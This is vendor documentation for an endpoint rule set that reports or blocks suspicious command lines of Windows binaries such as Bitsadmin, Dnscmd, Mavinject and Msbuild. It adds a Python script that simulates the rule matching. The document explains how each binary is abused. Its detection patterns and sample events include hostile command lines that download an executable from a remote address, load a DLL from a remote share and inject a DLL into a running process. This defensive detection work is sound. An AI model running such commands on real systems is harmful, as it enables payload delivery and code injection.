Purpose: To look for suspicious behavior based on unusual command lines.

Description: Reports or prevents behavior by common applications that is suspicious based on command line.

Enabled by Default: No
Platform: Windows
Minimum Agent Version Required: 8.0.0

The Edit Rapid Config for the Suspicious Command Line Protection A-M Rapid Config

Rapid Config Settings

As with most rapid configs, you can:

  • Enable or disable the rapid config.

  • Specify what policies the rapid config applies to.

In addition, you can choose to Do Nothing, Report, or Block the specific items or behaviors.

Note: We recommend setting each section to Report before setting it to Block. Use the resulting events to confirm that legitimate behavior (build servers, BITS-based updaters, accessibility tools, DNS administration) will not be impacted.

For each of the following sections, specify what action you require.

Atbroker.exe

Use this group to specify how to handle suspicious Atbroker command lines. Atbroker.exe is the Windows Assistive Technology Manager. Its /start switch launches whatever executable is registered as an assistive technology, so it can be used to run an arbitrary binary from a trusted Windows process.

The Atbroker.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Atbroker With Suspicious Command Lines:
Should execution of Atbroker with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Atbroker Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*/start*>Atbroker.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Bitsadmin.exe

Use this group to specify how to handle suspicious Bitsadmin command lines. Bitsadmin is the command line tool for the Background Intelligent Transfer Service (BITS). The switches listed below create and drive BITS jobs, which attackers use to download payloads in the background through a trusted Windows binary.

The Bitsadmin.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Bitsadmin With Suspicious Command Lines:
Should execution of Bitsadmin with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Bitsadmin Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*/cancel*>Bitsadmin.exe
  • <cmdline:*/complete*>Bitsadmin.exe
  • <cmdline:*/create*>Bitsadmin.exe
  • <cmdline:*/download*>Bitsadmin.exe
  • <cmdline:*/resume*>Bitsadmin.exe
  • <cmdline:*/transfer*>Bitsadmin.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Control.exe

Use this group to specify how to handle suspicious Control command lines. Control.exe runs the Control Panel application. A Control Panel item (.cpl) is a DLL that Control.exe loads and executes, so passing an attacker-supplied .cpl file runs arbitrary code.

The Control.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Control With Suspicious Command Lines:
Should execution of Control with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Control Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*.cpl*>Control.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Cscript.exe

Use this group to specify how to handle suspicious Cscript command lines. Cscript is the console-based Windows Script Host, which runs VBScript and JScript files.

The Cscript.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Cscript With Suspicious Command Lines:
Should execution of Cscript with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Cscript Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • \device\*:*
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Dnscmd.exe

Use this group to specify how to handle suspicious Dnscmd command lines. Dnscmd is a command line tool for managing DNS servers. The /serverlevelplugindll setting registers a DLL that the DNS Server service loads the next time it starts, typically as SYSTEM on a domain controller, so it is a known path to code execution and persistence.

The Dnscmd.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Dnscmd With Suspicious Command Lines:
Should execution of Dnscmd with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Dnscmd Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*/serverlevelplugindll*>Dnscmd.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Mavinject.exe

Use this group to specify how to handle suspicious Mavinject command lines. Mavinject is the Microsoft Application Virtualization (App-V) injector. Its /injectrunning switch injects a DLL into an already running process identified by PID, which makes it a signed, ready-made process-injection tool.

The Mavinject.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Mavinject With Suspicious Command Lines:
Should execution of Mavinject with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Mavinject Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*/injectrunning*>Mavinject.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Msbuild.exe

Use this group to specify how to handle suspicious Msbuild command lines. Msbuild is the Microsoft Build Engine. Project files (.csproj, .xml) can contain inline tasks whose code Msbuild compiles and runs, so a project file fetched from an untrusted location, or over HTTP, can execute arbitrary code under a signed Microsoft binary.

The Msbuild.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Msbuild With Suspicious Command Lines:
Should execution of Msbuild with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Msbuild Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*.csproj*>Msbuild.exe
  • <cmdline:*.xml*>Msbuild.exe
  • <cmdline:*http*>Msbuild.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.
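The sections above all follow the same shape: a per-application action (Do Nothing, Report, Block), a list of command-line patterns to report, and a list of exceptions. The following script is an added example, not Carbon Black code and not the agent's actual matching engine: it models that evaluation so that you can dry-run the default lists and your planned exclusions against process-start events before moving a section from Report to Block. Assumptions are labelled in the code: patterns are treated as case-insensitive wildcard globs over the full command line, an exclusion match takes precedence over a report match, and the bare Cscript default ("\device\*:*") is treated as a command-line pattern for Cscript.exe. The events are constructed for illustration, and 203.0.113.9 is a documentation address.

```python
import fnmatch
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Rule syntax as it appears on this page: <cmdline:PATTERN>Image.exe
# An entry without that prefix (the Cscript default "\device\*:*") is
# ASSUMED here to be a plain command-line pattern for the section's image.
_RULE_RE = re.compile(r"^<cmdline:(?P<pattern>[^>]*)>(?P<image>\S+)$")

# Default "Command Lines To Report" lists, copied from the sections above.
DEFAULTS: Dict[str, List[str]] = {
    "Atbroker.exe": ["<cmdline:*/start*>Atbroker.exe"],
    "Bitsadmin.exe": [f"<cmdline:*/{v}*>Bitsadmin.exe" for v in
                      ("cancel", "complete", "create", "download", "resume", "transfer")],
    "Control.exe": ["<cmdline:*.cpl*>Control.exe"],
    "Cscript.exe": [r"\device\*:*"],
    "Dnscmd.exe": ["<cmdline:*/serverlevelplugindll*>Dnscmd.exe"],
    "Mavinject.exe": ["<cmdline:*/injectrunning*>Mavinject.exe"],
    "Msbuild.exe": ["<cmdline:*.csproj*>Msbuild.exe",
                    "<cmdline:*.xml*>Msbuild.exe",
                    "<cmdline:*http*>Msbuild.exe"],
}


@dataclass
class Section:
    """One application group of the rapid config."""
    image: str                                        # e.g. "Atbroker.exe"
    action: str                                       # "Do Nothing" | "Report" | "Block"
    report: List[str]                                 # "Command Lines To Report"
    exclude: List[str] = field(default_factory=list)  # "Should Not Be Reported"


def parse_rule(rule: str, section_image: str) -> Tuple[str, str]:
    """Split one list entry into (image glob, command-line glob)."""
    m = _RULE_RE.match(rule.strip())
    if m:
        return m.group("image"), m.group("pattern")
    return section_image, rule.strip()          # assumption: bare pattern applies to the section image


def _glob(value: str, pattern: str) -> bool:
    # Windows image names, switches and paths are case-insensitive: fold both sides.
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def _matches(rule: str, section: Section, image: str, cmdline: str) -> bool:
    image_glob, cmdline_glob = parse_rule(rule, section.image)
    return _glob(image, image_glob) and _glob(cmdline, cmdline_glob)


def evaluate(section: Section, image: str, cmdline: str) -> str:
    """Return "Allow", or the section's configured action, for one process start.

    Precedence modelled here (an assumption): wrong image -> Allow; section set
    to Do Nothing -> Allow; exclusion match -> Allow; report match -> the
    section's action (Report or Block); otherwise Allow.
    """
    if not _glob(image, section.image) or section.action == "Do Nothing":
        return "Allow"
    if any(_matches(r, section, image, cmdline) for r in section.exclude):
        return "Allow"
    if any(_matches(r, section, image, cmdline) for r in section.report):
        return section.action
    return "Allow"


def build_policy(action: str = "Report",
                 exclusions: Optional[Dict[str, List[str]]] = None) -> Dict[str, Section]:
    """Every section set to the same action, keyed by lower-cased image name."""
    exclusions = exclusions or {}
    return {img.lower(): Section(img, action, rules, exclusions.get(img, []))
            for img, rules in DEFAULTS.items()}


def triage(policy: Dict[str, Section],
           events: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Run (image, command line) process-start events through the policy."""
    out = []
    for image, cmdline in events:
        section = policy.get(image.lower())
        out.append((cmdline, evaluate(section, image, cmdline) if section else "Allow"))
    return out


# Constructed process-start events (not real telemetry).
SAMPLE_EVENTS = [
    ("AtBroker.exe",  r"AtBroker.exe /start accessibility_helper"),
    ("bitsadmin.exe", r"bitsadmin.exe /transfer upd /download /priority high http://203.0.113.9/x.exe C:\Users\Public\x.exe"),
    ("control.exe",   r"control.exe C:\Users\bob\AppData\Local\Temp\driver.cpl"),
    ("control.exe",   r"control.exe /name Microsoft.System"),
    ("dnscmd.exe",    r"dnscmd.exe /config /serverlevelplugindll \\203.0.113.9\share\plugin.dll"),
    ("MSBuild.exe",   r"MSBuild.exe C:\build\app.csproj /t:Build"),
    ("MSBuild.exe",   r"MSBuild.exe C:\Users\bob\Downloads\payload.csproj"),
    ("mavinject.exe", r"mavinject.exe 4412 /INJECTRUNNING C:\Users\Public\hook.dll"),
    ("cscript.exe",   r"cscript.exe //nologo C:\Scripts\inventory.vbs"),
]

if __name__ == "__main__":
    # Report mode first, with the CI build tree excluded so legitimate builds stay quiet.
    policy = build_policy("Report", {"Msbuild.exe": [r"<cmdline:*C:\build\*>Msbuild.exe"]})
    for cmdline, verdict in triage(policy, SAMPLE_EVENTS):
        print(f"{verdict:<7} {cmdline}")
```

Run it once with every section in Report mode and feed it the command lines you collected during the baseline period; each event that comes back as Report is one that would be blocked later, so either it is something you want stopped or it needs an entry under Command Lines That Should Not Be Reported. Note that the exclusion in the usage above is deliberately narrow (one build directory); an exclusion such as `<cmdline:*.csproj*>Msbuild.exe` would silence the whole section.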